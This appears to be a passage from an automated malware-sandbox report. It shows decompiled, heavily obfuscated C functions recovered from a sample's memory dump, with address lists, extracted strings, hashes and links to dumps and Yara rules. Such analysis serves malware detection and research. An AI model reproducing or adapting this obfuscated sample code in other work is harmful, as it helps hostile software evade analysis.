				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E0022889D(0x22c930, _v1076, __eflags);
								_t368 =  *0x22ca2c; // 0x558300
								__eflags = _t368 + 0x230;
								_t419 =  *0x22ca2c; // 0x558300
								E002129E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00222025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x22ca2c; // 0x558300
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E0021C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E002165A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00220ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00211AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E0022889D(0x22c9d0, _v1184, _t440);
													_pop(_t405);
													E00223EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x22c9d0, _v1124, _v1208, 0x22c9d0, _v1164, 0x22c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00222025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}

0x00216d9f
0x00216da5
0x00216db2
0x00216dbb
0x00216dc3
0x00216dcb
0x00216dd0
0x00216dd8
0x00216de0
0x00216de5
0x00216ded
0x00216df5
0x00216dfd
0x00216e05
0x00216e0d
0x00216e19
0x00216e20
0x00216e2b
0x00216e30
0x00216e36
0x00216e3e
0x00216e46
0x00216e59
0x00216e5a
0x00216e61
0x00216e6c
0x00216e74
0x00216e79
0x00216e7e
0x00216e86
0x00216e8e
0x00216e96
0x00216e9e
0x00216ea6
0x00216eae
0x00216eb9
0x00216ec4
0x00216ecf
0x00216ed7
0x00216ee1
0x00216ee5
0x00216eed
0x00216ef5
0x00216efa
0x00216f02
0x00216f07
0x00216f0f
0x00216f1a
0x00216f25
0x00216f30
0x00216f38
0x00216f40
0x00216f45
0x00216f4d
0x00216f58
0x00216f63
0x00216f6e
0x00216f79
0x00216f84
0x00216f8f
0x00216fa3
0x00216faa
0x00216fb5
0x00216fbd
0x00216fc5
0x00216fca
0x00216fd2
0x00216fda
0x00216fe4
0x00216ff2
0x00216ff7
0x00216ffd
0x00217005
0x0021700d
0x00217015
0x0021701a
0x00217022
0x0021702a
0x00217032
0x0021703a
0x0021703f
0x00217047
0x0021704f
0x0021705a
0x00217062
0x0021706d
0x00217078
0x00217083
0x0021708e
0x00217096
0x0021709b
0x002170a3
0x002170ab
0x002170b3
0x002170bb
0x002170c3
0x002170cb
0x002170d8
0x002170db
0x002170df
0x002170e4
0x002170ec
0x002170f4
0x002170fc
0x00217104
0x0021710c
0x00217114
0x0021711f
0x00217127
0x00217132
0x0021713a
0x00217142
0x0021714a
0x00217152
0x0021715a
0x0021715f
0x00217167
0x0021716c
0x00217174
0x0021717c
0x00217184
0x00217189
0x00217191
0x002171a7
0x002171ae
0x002171b9
0x002171c1
0x002171c6
0x002171ce
0x002171d6
0x002171e2
0x002171e5
0x002171e9
0x002171ee
0x002171f6
0x002171fe
0x0021720b
0x00217210
0x00217218
0x00217220
0x0021722b
0x00217236
0x00217241
0x00217249
0x0021724e
0x00217253
0x0021725b
0x00217263
0x00217268
0x00217270
0x00217278
0x00217280
0x00217285
0x0021728a
0x00217292
0x00217299
0x002172a1
0x002172a9
0x002172b1
0x002172b9
0x002172c4
0x002172cf
0x002172da
0x002172e2
0x002172e7
0x002172ec
0x002172f4
0x002172fc
0x002172fc
0x002172fe
0x002172ff
0x002172ff
0x002172ff
0x00217304
0x00217304
0x0021730a
0x00217487
0x00217497
0x002174bb
0x002174c0
0x002174d5
0x002174e1
0x002174f7
0x002174fc
0x002174ff
0x00000000
0x00217310
0x00217316
0x00217467
0x0021746d
0x00217478
0x00217478
0x0021747b
0x00000000
0x00000000
0x00217475
0x00217475
0x00217475
0x0021747d
0x00217480
0x00000000
0x0021731c
0x00217322
0x00217433
0x00217434
0x00217455
0x0021745a
0x0021745d
0x00000000
0x00217328
0x0021732e
0x00217537
0x00217334
0x00217336
0x002173d6
0x002173db
0x00217413
0x0021741a
0x0021741d
0x0021741f
0x00217427
0x002172fc
0x002172fc
0x002172fe
0x002172ff
0x002172ff
0x00000000
0x002172ff
0x0021733c
0x0021733c
0x0021733e
0x00217344
0x00217351
0x00217356
0x00217392
0x002173b4
0x002173b7
0x002173bc
0x00217504
0x00217506
0x0021750b
0x0021750b
0x00000000
0x0021733e
0x00217336
0x0021732e
0x00217322
0x00217316
0x0021753f
0x00217550
0x0021750c
0x0021750c
0x00000000
0x00217518
0x002172ff

Strings

C', xrefs: 002171B9
<], xrefs: 00216E3E
Sg, xrefs: 00217220
6oD, xrefs: 00216DA5
7i, xrefs: 00216FCA
`c, xrefs: 00216E6C
), xrefs: 00216DD0
g)s, xrefs: 00217127
RX, xrefs: 0021725B
"D, xrefs: 00216DC3
c, xrefs: 00217032

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
API String ID: 1514166925-3192994148
Opcode ID: 7f8180f976954a56800485d75ccf87127bf5c3457e44308d84d91ca7759ea12c
Instruction ID: 0f949049c5abf2e09e76baaf306259f83e9caef2e9b6cb79a5aa911deef3294a
Opcode Fuzzy Hash: 7f8180f976954a56800485d75ccf87127bf5c3457e44308d84d91ca7759ea12c
Instruction Fuzzy Hash: AB0214725187819FE3A4CF61D84AA8FBBE1BBC5748F10890CF1D9862A0D7B58959CF03

Uniqueness

Uniqueness Score: -1.00%

Function 0021BB3A, Relevance: 14.0, Strings: 11, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0021BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E0021602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00212833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E0022337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E002293A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E0022889D(0x22c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00217AB1(_v168, _a16, 0x22c000, 0x22c000, _v152 | _v176, _v100, 0x22c000, 0x22c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00222025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}

0x0021bb44
0x0021bb4d
0x0021bb4e
0x0021bb55
0x0021bb5c
0x0021bb63
0x0021bb6a
0x0021bb6b
0x0021bb6c
0x0021bb6d
0x0021bb72
0x0021bb79
0x0021bb7b
0x0021bb83
0x0021bb86
0x0021bb92
0x0021bb99
0x0021bb9c
0x0021bba0
0x0021bba8
0x0021bbb0
0x0021bbb8
0x0021bbc0
0x0021bbc5
0x0021bbcd
0x0021bbd5
0x0021bbdd
0x0021bbe2
0x0021bbea
0x0021bbf2
0x0021bbfa
0x0021bc02
0x0021bc0a
0x0021bc12
0x0021bc17
0x0021bc1c
0x0021bc24
0x0021bc2c
0x0021bc34
0x0021bc44
0x0021bc48
0x0021bc50
0x0021bc58
0x0021bc60
0x0021bc68
0x0021bc70
0x0021bc7d
0x0021bc80
0x0021bc8c
0x0021bc90
0x0021bc98
0x0021bcab
0x0021bcac
0x0021bcb3
0x0021bcbe
0x0021bcc6
0x0021bcd1
0x0021bcd5
0x0021bcdd
0x0021bce5
0x0021bced
0x0021bcf2
0x0021bcfc
0x0021bd04
0x0021bd08
0x0021bd17
0x0021bd1a
0x0021bd1e
0x0021bd26
0x0021bd2e
0x0021bd36
0x0021bd3e
0x0021bd43
0x0021bd47
0x0021bd4f
0x0021bd57
0x0021bd61
0x0021bd65
0x0021bd6d
0x0021bd78
0x0021bd83
0x0021bd8e
0x0021bd96
0x0021bd9b
0x0021bda3
0x0021bdab
0x0021bdb3
0x0021bdc0
0x0021bdc4
0x0021bdc9
0x0021bdd1
0x0021bdd9
0x0021bde1
0x0021bde6
0x0021bdee
0x0021bdf6
0x0021be03
0x0021be0f
0x0021be13
0x0021be1b
0x0021be23
0x0021be28
0x0021be30
0x0021be38
0x0021be44
0x0021be49
0x0021be4f
0x0021be57
0x0021be5f
0x0021be67
0x0021be6f
0x0021be77
0x0021be7f
0x0021be87
0x0021be8f
0x0021be97
0x0021be9f
0x0021bea4
0x0021beaa
0x0021beb2
0x0021beba
0x0021bec6
0x0021bec9
0x0021bed2
0x0021bedf
0x0021beec
0x0021bef4
0x0021befc
0x0021bf04
0x0021bf0c
0x0021bf11
0x0021bf19
0x0021bf21
0x0021bf29
0x0021bf31
0x0021bf39
0x0021bf3e
0x0021bf46
0x0021bf53
0x0021bf57
0x0021bf5f
0x0021bf5f
0x0021bf65
0x0021bf9e
0x0021bfa3
0x0021bfa6
0x0021bfa8
0x0021bfae
0x00000000
0x0021bfae
0x0021bf67
0x0021bf69
0x0021c0b1
0x0021bf6f
0x0021bf75
0x00000000
0x0021bf7b
0x0021bf7b
0x00000000
0x0021bf7b
0x0021bf75
0x0021bf69
0x0021c0ba
0x0021c0c5
0x0021c0c5
0x0021bfcf
0x0021bfd4
0x0021bfe1
0x0021bff4
0x0021c054
0x0021c06b
0x0021c082
0x0021c087
0x0021c08a
0x0021c08c
0x0021c08c
0x0021c08c
0x00000000

Strings

t, xrefs: 0021BC48
M}, xrefs: 0021BDC9
.), xrefs: 0021BBB8
l0, xrefs: 0021BEAA
f, xrefs: 0021BC1C
AX, xrefs: 0021BD3E
D, xrefs: 0021BFE1
tI, xrefs: 0021BC3C
):, xrefs: 0021BEF4
25, xrefs: 0021BF04
t, xrefs: 0021BF21

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: t$):$.)$25$D$M}$l0$AX$f$t$tI
API String ID: 0-3778435269
Opcode ID: 34e06135d815c83ea119faea9e092319806a900cc15c9965a31a5e6d42d68577
Instruction ID: 3d4427bfd287b041c3456248eefd24a5506056147bd51eccb8e739d4e276e88a
Opcode Fuzzy Hash: 34e06135d815c83ea119faea9e092319806a900cc15c9965a31a5e6d42d68577
Instruction Fuzzy Hash: 75D100715083819FE364CF65C889A5FFBE1BBD4358F20891DF29A86260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00228F49, Relevance: 12.7, Strings: 10, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00228F49() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				void* _t238;
				void* _t239;
				void* _t240;
				void* _t245;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t258;
				void* _t264;
				intOrPtr _t282;
				void* _t286;
				signed int* _t290;

				_t290 =  &_v1144;
				_v1044 = _v1044 & 0x00000000;
				_v1048 = 0x4ebe6;
				_v1128 = 0x778f;
				_v1128 = _v1128 | 0xa1323825;
				_t249 = 0x13;
				_v1128 = _v1128 / _t249;
				_v1128 = _v1128 << 2;
				_t286 = 0x35c963e4;
				_v1128 = _v1128 ^ 0x21ef9208;
				_v1052 = 0x4cd;
				_v1052 = _v1052 | 0x68cff677;
				_v1052 = _v1052 ^ 0x68cf93fd;
				_v1092 = 0x77ae;
				_v1092 = _v1092 >> 0xa;
				_v1092 = _v1092 ^ 0x00005fc7;
				_v1060 = 0x2f45;
				_v1060 = _v1060 | 0xa1a9613d;
				_v1060 = _v1060 ^ 0xa1a96f30;
				_v1096 = 0x6d0d;
				_v1096 = _v1096 << 2;
				_v1096 = _v1096 | 0xf85e23e8;
				_v1096 = _v1096 ^ 0xf85f94d5;
				_v1136 = 0xe906;
				_t250 = 0x4b;
				_v1136 = _v1136 * 0x76;
				_v1136 = _v1136 + 0x8e3a;
				_v1136 = _v1136 << 8;
				_v1136 = _v1136 ^ 0x6bf6f1e6;
				_v1104 = 0x5e2e;
				_v1104 = _v1104 >> 0xd;
				_v1104 = _v1104 * 0x2c;
				_v1104 = _v1104 ^ 0x0000496b;
				_v1144 = 0xf2e9;
				_v1144 = _v1144 + 0xd50c;
				_v1144 = _v1144 / _t250;
				_v1144 = _v1144 ^ 0x9fddb036;
				_v1144 = _v1144 ^ 0x9fdde12f;
				_v1108 = 0x6902;
				_v1108 = _v1108 | 0xfbe10d26;
				_v1108 = _v1108 * 0x44;
				_v1108 = _v1108 ^ 0xe7e09cc2;
				_v1120 = 0xf3f1;
				_v1120 = _v1120 + 0xffff8a4f;
				_v1120 = _v1120 >> 6;
				_v1120 = _v1120 * 0x67;
				_v1120 = _v1120 ^ 0x0000b01d;
				_v1088 = 0xb368;
				_v1088 = _v1088 + 0x9734;
				_v1088 = _v1088 ^ 0x00010c20;
				_v1076 = 0x650d;
				_v1076 = _v1076 ^ 0x0544b8d8;
				_v1076 = _v1076 ^ 0x054483f2;
				_v1056 = 0xabff;
				_v1056 = _v1056 ^ 0x935518d0;
				_v1056 = _v1056 ^ 0x9355abf6;
				_v1068 = 0xb772;
				_v1068 = _v1068 << 2;
				_v1068 = _v1068 ^ 0x00028ed1;
				_v1124 = 0xbc7e;
				_v1124 = _v1124 * 0x39;
				_v1124 = _v1124 + 0x3dff;
				_v1124 = _v1124 ^ 0x966a7207;
				_v1124 = _v1124 ^ 0x9640526c;
				_v1132 = 0xba5f;
				_v1132 = _v1132 << 0xb;
				_v1132 = _v1132 << 5;
				_t251 = 0x75;
				_v1132 = _v1132 / _t251;
				_v1132 = _v1132 ^ 0x0197c6fa;
				_v1140 = 0x5fea;
				_t252 = 0x3c;
				_v1140 = _v1140 * 0xa;
				_v1140 = _v1140 * 0x2d;
				_v1140 = _v1140 >> 2;
				_v1140 = _v1140 ^ 0x002a725f;
				_v1100 = 0x79ec;
				_v1100 = _v1100 << 8;
				_v1100 = _v1100 ^ 0x69f808d7;
				_v1100 = _v1100 ^ 0x69818172;
				_v1084 = 0xd5eb;
				_v1084 = _v1084 ^ 0xb139babe;
				_v1084 = _v1084 ^ 0xb1392951;
				_v1072 = 0x4dbe;
				_v1072 = _v1072 ^ 0x00003bef;
				_v1080 = 0x7ef4;
				_v1080 = _v1080 / _t252;
				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E002285BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00217B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E0022889D(0x22c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0x22ca2c; // 0x558300
						_t196 = _t282 + 0x230; // 0x680053
						E0021C680(_t196, _v1096, _v1136, _t264, _v1104,  *0x22ca2c, _t245,  &_v520);
						_t238 = E00222025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E0022889D(0x22c980, _v1088, __eflags);
					_t240 = E00228C8F(_v1056);
					_t258 =  *0x22ca2c; // 0x558300
					_t210 = _t258 + 0x230; // 0x558530
					E002129E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00222025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}

0x00228f49
0x00228f4f
0x00228f56
0x00228f5e
0x00228f66
0x00228f78
0x00228f7d
0x00228f83
0x00228f88
0x00228f8d
0x00228f95
0x00228f9d
0x00228fa5
0x00228fad
0x00228fb5
0x00228fc2
0x00228fca
0x00228fd2
0x00228fda
0x00228fe2
0x00228fea
0x00228fef
0x00228ff7
0x00228fff
0x0022900c
0x0022900d
0x00229011
0x00229019
0x0022901e
0x00229026
0x0022902e
0x00229038
0x0022903c
0x00229044
0x0022904c
0x0022905a
0x0022905e
0x00229066
0x0022906e
0x00229076
0x00229083
0x00229087
0x0022908f
0x00229097
0x0022909f
0x002290a9
0x002290ad
0x002290b5
0x002290bd
0x002290c5
0x002290cd
0x002290d5
0x002290dd
0x002290e5
0x002290ed
0x002290f5
0x002290fd
0x00229105
0x0022910a
0x00229112
0x0022911f
0x00229123
0x0022912b
0x00229133
0x0022913d
0x00229145
0x0022914a
0x00229155
0x0022915a
0x00229160
0x00229168
0x00229175
0x00229178
0x00229181
0x00229185
0x0022918a
0x00229192
0x0022919a
0x0022919f
0x002291a7
0x002291af
0x002291b7
0x002291bf
0x002291c7
0x002291d7
0x002291df
0x002291ef
0x002291f3
0x002291fb
0x00229203
0x0022920b
0x00229213
0x0022921b
0x00229223
0x0022922b
0x00229233
0x0022923b
0x00229247
0x0022924a
0x0022924e
0x00229256
0x00229262
0x00229276
0x00229276
0x00229280
0x0022938d
0x00229395
0x00000000
0x0022939c
0x0022928c
0x002292fc
0x00000000
0x002292fc
0x0022928e
0x00229290
0x00000000
0x00000000
0x00229296
0x002292a3
0x002292a8
0x002292c7
0x002292d4
0x002292da
0x002292ed
0x002292f2
0x002292f5
0x002292f5
0x00229303
0x00229310
0x0022931f
0x00229341
0x0022934d
0x00229353
0x00229369
0x0022936e
0x00229371
0x00229373
0x00229373
0x00229373
0x00000000

Strings

_r*, xrefs: 0022918A
y, xrefs: 00229192
aS, xrefs: 00229203
E/, xrefs: 00228FCA
kI, xrefs: 0022903C
;, xrefs: 002291D7
Cg+, xrefs: 00229267
m, xrefs: 00228FE2
_r*, xrefs: 00229170, 0022917C
e, xrefs: 002290CD

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
API String ID: 0-1402005448
Opcode ID: 54a261754413ee352aca0bc72fce5043e1213bd7b12b23180e931f86fc393f97
Instruction ID: 2841d0a297911533e9523e2d64b35846908b0137af80178832c7d47ebcc3b2ac
Opcode Fuzzy Hash: 54a261754413ee352aca0bc72fce5043e1213bd7b12b23180e931f86fc393f97
Instruction Fuzzy Hash: 71B1427140D3819FD358CF64D58A44BFBE1FBC8798F208A1DF595862A0C7B98A59CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00221773, Relevance: 12.6, Strings: 10, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00221773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
